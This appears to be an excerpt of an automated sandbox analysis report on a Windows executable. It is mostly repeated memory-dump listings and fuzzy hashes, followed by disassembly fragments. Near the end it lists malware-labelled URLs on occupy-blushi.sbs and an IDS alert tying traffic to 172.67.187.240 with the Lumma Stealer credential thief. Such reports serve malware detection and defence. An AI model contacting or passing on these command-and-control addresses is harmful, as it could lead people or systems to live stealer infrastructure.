Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a8165f73f390a22bc552f71ca38d23da4c798ea34faf43f8664acdcd08e7095
Instruction ID: f64315bd90bf8ceba41370b7d44c1053d196dfd94af158e55d658258c7c2bb3a
Opcode Fuzzy Hash: 9a8165f73f390a22bc552f71ca38d23da4c798ea34faf43f8664acdcd08e7095
Instruction Fuzzy Hash: F93127F3F6162147F3580879CD9936254879BA5324F2F43394F28AB7C6DCBE8D0A1288

Function 00B063FD Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aad3acfc6fcc73892d91593f35222b3697094a545dea09e31187ce4708b04ce6
Instruction ID: 8ace0a9369f250508be3c3eaf360214acebabb963104dfc16d88d3ed77a23b16
Opcode Fuzzy Hash: aad3acfc6fcc73892d91593f35222b3697094a545dea09e31187ce4708b04ce6
Instruction Fuzzy Hash: F1315CF3F6152147F3984879CDA8366554397D5321F2F87388F19ABAC5CC3D89091284

Function 00B1E4E4 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8beb206aef5f14726b853bed5856ce06b8c1d316f7cba47f7c298d205715ff7c
Instruction ID: 77fd72bbe3b8ff2f822b907aec7d7005137c480b040146059fc6be638b55902e
Opcode Fuzzy Hash: 8beb206aef5f14726b853bed5856ce06b8c1d316f7cba47f7c298d205715ff7c
Instruction Fuzzy Hash: 993128B3F5152647F3648839CD583A265839BD1310F2F82798F5DABAC9DC7E4D0A5288

Function 00A9F3EF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 90eb4e09a71a637883840b83d8a4921cd5380d393e4176fe5c099c8707025710
Instruction ID: 8e7ad276498162e2cbdfec41bf3f2f5db59da219d0048512de5492737077029d
Opcode Fuzzy Hash: 90eb4e09a71a637883840b83d8a4921cd5380d393e4176fe5c099c8707025710
Instruction Fuzzy Hash: 083190302193409FDF68DB28C991ABBB7E1FFE1314F54066DE0934A1A2DB3099068B93

Function 00B56372 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 587fa75cf537577aba7ea8239b2db0850dccb86262455530c087df89dfae29f7
Instruction ID: 5743fe7445df13004f04ae22332452ba3935e9d63f6ebb2069e94da34dc4886d
Opcode Fuzzy Hash: 587fa75cf537577aba7ea8239b2db0850dccb86262455530c087df89dfae29f7
Instruction Fuzzy Hash: 5821FFB3E5113547F364886ADC94362A0839BE5324F2F82798E5CBB7C9E87E4C0612C8

Function 00BF2108 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c730c86fac21f7f9152cd35aa56ad5f09af8b3ce506df285a7567933923712
Instruction ID: 6d4a68d5e0e846c7b3f5004299a6a62847b1af3d48b9e5c805d53448245963b6
Opcode Fuzzy Hash: 94c730c86fac21f7f9152cd35aa56ad5f09af8b3ce506df285a7567933923712
Instruction Fuzzy Hash: B22107B3F5252547F3904879CDA8362958397D5324F2F83788E6CABBCAE83E5D0912C0

Function 00B52200 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52433a464413fae849a7acdc50a178f1487c88b9994d1d7432ee152d92259245
Instruction ID: 01968bc099b7534a066451e037c8cd74fb5604030142d7b6d5ba22265ba576d1
Opcode Fuzzy Hash: 52433a464413fae849a7acdc50a178f1487c88b9994d1d7432ee152d92259245
Instruction Fuzzy Hash: 46314CB3F5162147F3584824DCA93A2258397A5324F3F427D8F1D6B7C6DCBE5C0A5284

Function 00BCE108 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23562601c15f7c638f3c575c0cdb079c5a5096b1a47d057d3a4d705b37ed284
Instruction ID: f186d1725e395a265545317762aedb709a7d622aa3185a5bc5b431d1422a0352
Opcode Fuzzy Hash: a23562601c15f7c638f3c575c0cdb079c5a5096b1a47d057d3a4d705b37ed284
Instruction Fuzzy Hash: EF215EF3F5122647F3A44879CD983A76542DB91314F2F82788E5CABBC5D87E8E092384

Function 00B822EB Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e44fd961fa0467ec7ff6f83ce1eba48048f80a8c328382bb1bd963c3fe73bbc7
Instruction ID: 7ffd075a2f2818ee936f39f2298a63539440ebbf5ec43eeb7c7af5abf8ce0ab3
Opcode Fuzzy Hash: e44fd961fa0467ec7ff6f83ce1eba48048f80a8c328382bb1bd963c3fe73bbc7
Instruction Fuzzy Hash: 8A216FF3E1162147F38488B9D998322A582D795320F3B82789F2CB77C5DCBD4D0A42C8

Function 00B1F1EF Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4dad6e2397b1079478b482162156631b932b60f6fa8f7cb47c62513b9ffca91
Instruction ID: b47434ed34652d36d1dd15428075d8abfc99424949c65d3d5ebf2fd964d9b129
Opcode Fuzzy Hash: c4dad6e2397b1079478b482162156631b932b60f6fa8f7cb47c62513b9ffca91
Instruction Fuzzy Hash: C92136B3F9252647F3644861CC6436291839B95320F2F82B88F1D6B7C5D87E5C0A22C8

Source: https://occupy-blushi.sbs/5	Avira URL Cloud: Label: malware
Source: https://occupy-blushi.sbs/apintel	Avira URL Cloud: Label: malware
Source: https://occupy-blushi.sbs/api46k	Avira URL Cloud: Label: malware
Source: https://occupy-blushi.sbs/apie	Avira URL Cloud: Label: malware
Source: https://occupy-blushi.sbs/api?k	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+0576C96Fh]	0_2_00AC83C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax+18DEF997h]	0_2_00ABC6B7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ecx, edx	0_2_00AC8690
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 61813E67h	0_2_00AB67C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 61813E67h	0_2_00AB67C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-4EFF805Ch]	0_2_00AB67C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	0_2_00AD07C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00A9EAEB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [ebp+edx-05DD6E63h]	0_2_00A9AA50
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edx], cl	0_2_00ABD44F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00AB3730
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], bl	0_2_00A9DBE5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], dl	0_2_00A9DBE5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	0_2_00ACDC1F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, ebx	0_2_00ACC0C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edi]	0_2_00ACC0C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+78h]	0_2_00AB42E2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-781FA937h]	0_2_00AB8328
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	0_2_00AB2320
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp+00h], 00000022h	0_2_00ABA5B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-20h]	0_2_00AB2580
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]	0_2_00A98520
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ebp+edx*4+00h], ax	0_2_00A98520
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]	0_2_00A98520
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00ABA510
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+edx+00h]	0_2_00A92620
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	0_2_00AB6660
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc eax	0_2_00AAE7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, edx	0_2_00AAE7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp edx	0_2_00A948EF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00A948EF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then push esi	0_2_00AACA60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00A94BF8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-278BA32Fh]	0_2_00AB6B30
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	0_2_00AD0B00
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00AB2C6C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], si	0_2_00AB0DFC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ecx], dl	0_2_00ABCDF3
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx]	0_2_00ACEE70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00AA8F1F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ebx+0576C973h]	0_2_00AC90C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi]	0_2_00AAF1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_00ABB120
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00AB910B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+58h]	0_2_00AB910B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+00000100h]	0_2_00AA929E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edi*8], 2AFA9B37h	0_2_00AB32E2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00AB32E2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00AB32E2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edi*8], 2AFA9B37h	0_2_00AB3247
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00AB3247
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00AB3247
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00A9F3EF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00AB910B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+58h]	0_2_00AB910B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+2Ch], ebp	0_2_00ACF3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+00000100h]	0_2_00AA929E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [eax+edi+23h], 00000000h	0_2_00A9B432
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00AC5580
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_00ABD6F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [ecx]	0_2_00AB5672
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_00ABD65E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then push esi	0_2_00AB17A3
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ecx, eax	0_2_00AB579D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00ABD72F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh	0_2_00ACB840
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov esi, ecx	0_2_00ACB840
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+20h]	0_2_00AB9970
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ecx, eax	0_2_00AB579D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_00AAB940
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edx], cl	0_2_00AAB940
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	0_2_00AABAA8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00AA7AF1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_00ABBA11
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov esi, ebx	0_2_00AB9A43
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx-0000009Ah]	0_2_00ACDA5A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi-56FE73B9h]	0_2_00AB5BD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00AA51D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_00ABDB6C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00AB5EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 1B6183F2h	0_2_00AB5EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00ABDE25
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+04h]	0_2_00AA9FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-45h]	0_2_00AA9FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+64h]	0_2_00AA9FF0

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 172.67.187.240:443
